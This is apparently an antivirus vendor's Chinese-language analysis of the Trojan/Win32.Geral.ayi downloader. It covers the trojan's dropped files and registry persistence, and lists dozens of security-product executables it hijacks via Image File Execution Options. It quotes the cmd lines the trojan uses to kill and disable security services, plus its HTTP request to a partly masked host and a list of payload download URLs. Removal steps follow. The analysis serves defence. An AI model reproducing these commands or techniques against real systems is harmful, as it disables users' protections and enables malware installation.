Trojan/Win32.Geral.ayi[Downloader]分析

病毒标签

病毒名称： Trojan/Win32.Geral.ayi[Downloader]
病毒类型： 木马
文件 MD5： FDF410DE5005DBF120DF15EC41292FB9
公开范围： 完全公开
危害等级： 4
文件长度： 30,583 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： Upack

病毒描述

    该恶意代码为木马，病毒运行后隐藏开启一个"notepad.exe"（记事本）进程，查找类名"Notepad"的窗体，找到之后向该窗体发送WM_CLOSE消息，隐藏调用CMD命令禁用"ekrn"（安全软件）服务，并结束ekrn.exe安全软件进程，创建随机病毒名DLL文件到%Windir%目录下，调用rundll32.exe启动病毒DLL文件，等待1000ms后再将病毒DLL文件删除，创建一个线程，再次调用CMD命令行停止禁用部分系统安全软件服务进程，再次创建病毒文件到%Windir%目录下并启动创建后的病毒文件，动态加载系统库文件"advapi32.dll"获取服务相关API函数，释放驱动文件到%System32%\drivers\目录下，创建病毒注册表服务以服务方式启动病毒，等待驱动文件启动之后再删除驱动文件，添加注册表映像劫持劫持多款安全软件，在%HomeDrive%目录下添加AUTORUN.INF使双击目录打开病毒文件，删除注册表run键值下所有启动项，并在RUN键下添加scvhost.exe病毒的启动路径。

行为分析-本地行为

1、文件运行后会释放以下文件
%Windir%\ee919875t.dll 该病毒DLL文件释放驱动文件映像劫持各大杀软的主程序停止并删除大量安全软件进程
%Windir%\extext422203t.exe 该病毒文件提升当前所在用户访问权限、停止禁用安全软件服务连接网络发送统计信息下载恶意文件
%System32%\scvhost.exe 病毒原体文件
%System32%\drivers\pcidump.sys 该驱动文件恢复SSDT躲避删除安全软件服务躲避杀软主动防御警报
%System32%\drivers\AsyncMac.sys
%HomeDrive%\AUTORUN.INF
%HomeDrive%\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe 病毒原体文件

2、添加映像劫持、创建病毒服务及RUN启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\被劫持文件名\
值: 字符串: "svchost.exe"
360delays.exe、360delays.exe、360Safebox.exe、360tray.exe、AgentSvr.exe、antiarp.exe、avp.exe、bdagent.exe、ccapp.exe、CCenter.exe、ccEvtMgr.exe、ccSetMgr.exe、ccSvcHst.exe、defwatch.exe、DrUpdate.exe、egui.exe、ekrn.exe、engineserver.exe、FrameworkService.exe、KavStart.exe、KISSvc.exe、kmailmon.exe、KPFW32.exe、KPfwSvc.exe、KSWebShield.exe、KVSrvXP.exe、KWatch.exe、livesrv.exe、LiveUpdate360.exe、mcagent.exe、mcinsupd.exe、mcmscsvc.exe、mcnasvc.exe、McProxy.exe、mcshell.exe、mcshield.exe、mcsysmon.exe、McTray.exe、mcupdmgr.exe、mfeann.exe、mfevtps.exe、MpfSrv.exe、MPMon.exe、MPSVC.exe、MPSVC1.exe、MPSVC2.exe、naPrdMgr.exe、QQDoctor.exe、QQDoctorRtp.exe、Rav.exe、RavMon.exe、RavMonD.exe、RavStub.exe、RavTask.exe、RegGuide.exe、rfwsrv.exe、RsAgent.exe、rsnetsvr.exe、rssafety.exe、RsTray.exe、rtvscan.exe、safeboxTray.exe、ScanFrm.exe、SHSTAT.exe、udaterui.exe、Uplive.exe、vptray.exe、vsserv.exe、vstskmgr.exe、xcommsvr.exe
描述：被劫持的文件名
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\DisplayName
值: 字符串: "pcidump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\ImagePath
值: 字符串: "\??\C:\WINDOWS\system32\drivers\pcidump.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Start
值: DWORD: 4 (0x4)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Type
值: DWORD: 1 (0x1)
描述：添加病毒服务
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RsTray
值: 字符串: "C:\WINDOWS\system32\scvhost.exe"
描述：添加病毒RUN启动项

3、病毒运行后隐藏开启一个"notepad.exe"（记事本）进程，查找类名"Notepad"的窗体，找到之后向该窗体发送WM_CLOSE消息，通过以下指令隐藏调用CMD命令禁用"ekrn"（安全软件）服务，并结束ekrn.exe安全软件进程
cmd.exe /c taskkill.exe /im ekrn.exe /f
cmd /c sc config ekrn start= disabled
cmd /c net stop wscsvc
cmd /c net stop SharedAccess
cmd /c sc config sharedaccess start= disabled

行为分析-网络行为

GET /txt/weishenme.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: girlfired.d821e***.cn
Connection: Keep-Alive
描述：连接网络读取TXT列表容易下载以下病毒文件
1:http://laibuji.w528e***.cn/1.exe
1:http://laibuji.w528e***.cn/2.exe
1:http://laibuji.w528e***.cn/3.exe
1:http://laibuji.w528e***.cn/4.exe
1:http://laibuji.w528e***.cn/5.exe
1:http://laibuji.w528e***.cn/6.exe
1:http://laibuji.w528e***.cn/7.exe
1:http://laibuji.w528e***.cn/8.exe
1:http://laibuji.w528e***.cn/9.exe
1:http://laibuji.w528e***.cn/10.exe
1:http://laibuji.w528e***.cn/11.exe
1:http://laibuji.w528e***.cn/12.exe
1:http://laibuji.w528e***.cn/13.exe
1:http://laibuji.w528e***.cn/14.exe
1:http://laibuji.w528e***.cn/15.exe
1:http://laibuji.w528e***.cn/16.exe
1:http://laibuji.w528e***.cn/17.exe
1:http://laibuji.w528e***.cn/18.exe
1:http://laibuji.w528e***.cn/19.exe
1:http://laibuji.w528e***.cn/20.exe
1:http://laibuji.w528e***.cn/21.exe
1:http://laibuji.w528e***.cn/22.exe
1:http://laibuji.w528e***.cn/23.exe
1:http://laibuji.w528e***.cn/24.exe
1:http://laibuji.w528e***.cn/25.exe
1:http://laibuji.w528e***.cn/26.exe
1:http://laibuji.w528e***.cn/27.exe
1:http://laibuji.w528e***.cn/28.exe
1:http://laibuji.w528e***.cn/29.exe
1:http://laibuji.w528e***.cn/30.exe
1:http://laibuji.w528e***.cn/31.exe
1:http://laibuji.w528e***.cn/32.exe
1:http://laibuji.w528e***.cn/33.exe
1:http://laibuji.w528e***.cn/34.exe
1:http://laibuji.w528e***.cn/35.exe
1:http://laibuji.w528e***.cn/36.exe
1:http://laibuji.w528e***.cn/37.exe
1:http://laibuji.w528e***.cn/38.exe

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
         %Windir% 　　　　　 　　　　　 WINDODWS所在目录
         %DriveLetter%　 　　　　　　　 逻辑驱动器根目录
         %ProgramFiles%　 　 　　　　　 系统程序默认安装目录
         %HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
         %Documents and Settings% 　　　当前用户文档根目录
         %Temp% 　　　　　　　　　　　　\Documents and Settings\当前用户\Local Settings\Temp
         %System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
         Windows2000/NT中默认的安装路径是C:\Winnt\System32
         windows95/98/me中默认的安装路径是C:\Windows\System
         windowsXP中默认的安装路径是C:\Windows\System32

清除方案

1、使用安天防线可彻底清除此病毒(推荐)，请点击下载(http://www.antiyfx.com)。
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
推荐使用ATool管理工具，请点击下载(http://www.antiy.com/cn/download/index.htm)。
（1）使用ATOOL进程管理结束extext422203t.exe病毒进程。

（2）强行删除病毒文件
%Windir%\extext422203t.exe 　　　　
%System32%\scvhost.exe
%HomeDrive%\AUTORUN.INF
%HomeDrive%\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
%System32%\drivers\AsyncMac.sys

（3）删除病毒创建的注册表服务及RUN启动项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump
键值："WinSSCOM"
删除pcidump键下所有的键值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
值: 字符串: "\??\C:\WINDOWS\system32\drivers\scvhost.exe"
删除RUN键值下的"\??\C:\WINDOWS\system32\drivers\scvhost.exe"项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\被劫持文件名\
删除Image File Execution Options键下被劫持的安全软件文件名